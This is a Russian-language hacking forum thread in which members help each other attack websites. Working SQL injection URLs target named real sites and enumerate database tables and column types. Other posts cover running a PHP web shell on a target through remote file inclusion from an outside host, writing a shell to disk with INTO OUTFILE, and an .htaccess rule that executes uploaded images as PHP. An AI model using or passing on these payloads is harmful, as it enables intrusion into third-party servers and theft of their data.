Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    ne polucaetsya..
     
  2. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    ты прикалываешься?
    Code:
    http://www.unialco.com.br/jobs/details.php?id=-48%27+union+select+1,2,GROUP_CONCAT(TABLE_NAME),4,5,6,7,8,9,10+FROM+information_schema.tables+where+table_name%3E0x75736572+--+
    
    А что ты вообще сделать хочешь?
     
  3. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    я ету знаю..мне нуэн вот здес написат полное имя..

    http://www.unialco.com.br/jobs/details.php?id=-48%27+union+select+1,2,GROUP_CONCAT(COLUMN_NAME),4 ,5,6,7,8,9,10+FROM+information_schema.columns+WHER E+table_name=0x7573657273+AND+ASCII(LOWER(COLUMN_N AME))=x75736572+--+

    в конце написат полное имя таблици..и в какоы кодировке как написать ??
     
  4. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    Code:
    http://www.unialco.com.br/jobs/details.php?id=-48%27+union+select+1,2,GROUP_CONCAT(COLUMN_NAME),4%20,5,6,7,8,9,10+FROM+information_schema.columns+WHERE+table_name=0x7573657273+--+
    
    Открываешь исходный код, ищешь к примеру password и там все колонки, а вообще просто дописываешь and+column_name>hex твоей последней полученной колонки. Не глупи, и сам экспериментируй
     
    1 person likes this.
  5. Sams

    Sams Member

    Joined:
    18 Apr 2009
    Messages:
    247
    Likes Received:
    70
    Reputations:
    17
    Ребята, я вроде как не полный новичок, просто никогда не работал с шелами. Но надо же когда-то начинать :)
    Вопрос больше по теоретической части, по поводу запуска шела через php-include.
    Вот есть у меня на сайте шел http://mysite.com/shell.php, и есть инклуд (глобальный) http://site.com/index.php?dir=asdsad.
    Делаем так: http://site.com/index.php?dir=http://mysite.com./shell.php%00 (только не надо говорить, что такие ситуации сейчас встречаются редко и т.д. просто представим такую ситуацию, что все работает).
    Ну и собственно у меня появляется на мониторе мой шел. А теперь объясните мне, какой от него толк?! Ведь шел залит-то на моём сайте, и отображает директории все и информацию именно о моём сайте :confused: Просто отобразился мой шел с моего сайта на сайте site.com как бы в отдельном фрейме.
    Может быть у меня какое-то размытое понятие о шелах, об их разновидностях и использовании. Сам юзаю c99madshell.
    Увы, детальную инфу о шелах на форуме не нашел. Если я где-то что-то провтыкал, прошу указать, где можно об этом почитать. Заранее благодарен :)
     
    #11585 Sams, 28 Feb 2010
    Last edited: 28 Feb 2010
  6. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    Если там всеже ремоут инклюд,а не фрейм, тогда переименуй свой шелл в
    http://mysite.com/shell.txt

    и пробуй так
     
    1 person likes this.
  7. t3zo

    t3zo Member

    Joined:
    18 Feb 2010
    Messages:
    51
    Likes Received:
    14
    Reputations:
    5
    Проблема в том что у тя сайт поддерживает пхп а надо шелл держать либо на хосте без пхп, или изменить расширение....
     
  8. Sams

    Sams Member

    Joined:
    18 Apr 2009
    Messages:
    247
    Likes Received:
    70
    Reputations:
    17
    Да, точно, http://mysite.com/shell.txt заработало :)
    Хм, теперь стало чуть понятней принцип. Спасибо.
    А может кто-то дать ссылку на хорошую инфу по шелам? И каким лучше всего шелом пользоваться?
     
  9. t3zo

    t3zo Member

    Joined:
    18 Feb 2010
    Messages:
    51
    Likes Received:
    14
    Reputations:
    5
    редкий шелл - но крутой dxshell.

    лит-ры в основном нету, шелл это файловый менеджер.+ выполнение смд


    Постучись ко мне - скажи что не понимаешь объясню
     
    1 person likes this.
  10. kfor

    kfor Elder - Старейшина

    Joined:
    1 Sep 2005
    Messages:
    278
    Likes Received:
    48
    Reputations:
    29
    Sams, либо просто запихай шелл в папку с .htaccess в котором укажи что бы .php исполнялось как text.
     
    1 person likes this.
  11. kfor

    kfor Elder - Старейшина

    Joined:
    1 Sep 2005
    Messages:
    278
    Likes Received:
    48
    Reputations:
    29
    Ошибка какая? попрбуй .htaccess залить
    AddType application/x-httpd-php .php .htm .html .jpg .gif

    потом выбирай то что заливается =)
     
  12. FAQ666

    FAQ666 Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    38
    Likes Received:
    18
    Reputations:
    8
    Такая проблема:
    Нашел скулю заливаю через нее шелл
    INTO OUTFILE 'D:\htdocs\www.site.ru\shel.php'
    из внешки его не вижу, а по LOAD_FILE нормально видит.
    По LOAD_FILE невидно ни одного файла кроме тех что сам залил.

    В ошибках путь вылазит:
    D:\htdocs\www.site.ru\index.php
    D:\htdocs\www.site.ru\admin\conf.php

    Как найти реальное расположение сайта или что ето за прикол такой)?
     
  13. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Ну наверное тогда путь не тот
    База на другом серваке
    Чмоды

    concat_ws(0x3a,user,host)+from+mysql.user
    посмотри как прописан твой user()
     
  14. FAQ666

    FAQ666 Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    38
    Likes Received:
    18
    Reputations:
    8
    concat_ws(0x3a,user,host)
    L2Emu:127.0.0.1

    concat_ws(0x3a,user,host,file_priv)
    root:localhost:Y
     
  15. Iceangel_

    Iceangel_ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    494
    Likes Received:
    532
    Reputations:
    158
    2FAQ666
    что-то мне подсказывает, что проблема возникла из-за слешей, попробуй
     
    #11595 Iceangel_, 28 Feb 2010
    Last edited: 28 Feb 2010
    3 people like this.
  16. FAQ666

    FAQ666 Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    38
    Likes Received:
    18
    Reputations:
    8
    Ой спасибочки)))))) так и есть!
     
  17. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    А можно ли в инъекции определить тип поля и длину(если Text)?

    Пока ходил курить, нашёл ответ, если кого заинтересовало и кто не знает:
    GROUP_CONCAT(column_name,0x3a,column_type) from information_schema.columns where table_name='tablename'
     
    #11597 Seravin, 28 Feb 2010
    Last edited: 28 Feb 2010
  18. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    Code:
    http://www.dsthosting.com/billing/mod.php?mod=faq&mode=show&faq_id=-1+UNION+SELECT+1,2,3,4,5,6,7,GROUP_CONCAT(column_name,0x3a,column_type,0x3a,CHARACTER_MAXIMUM_LENGTH),9,10,11,12,13,GROUP_CONCAT(column_name,0x3a,column_type),15,16+from+information_schema.columns--
    
    Мне предоставляется!) ИМХО!)
     
  19. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    Не ну понятно, что я это для пятой. 4ая и о колонках особо инфой в скулях не блещет)
     
    1 person likes this.
  20. _iks_

    _iks_ Member

    Joined:
    21 Feb 2009
    Messages:
    60
    Likes Received:
    59
    Reputations:
    61
    Для оперы не знаю, а для Мозиллы есть плагин Tamper Data.
     
Thread Status:
Not open for further replies.